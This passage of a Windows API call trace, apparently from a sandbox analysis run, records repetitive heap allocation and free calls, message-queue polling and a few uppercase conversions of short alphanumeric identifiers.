hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.926] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.928] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.929] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.930] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.930] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0256.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.930] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.931] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.931] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.932] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0256.932] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0256.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.932] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.933] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.933] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.934] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.935] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.935] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.935] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.936] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.936] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: 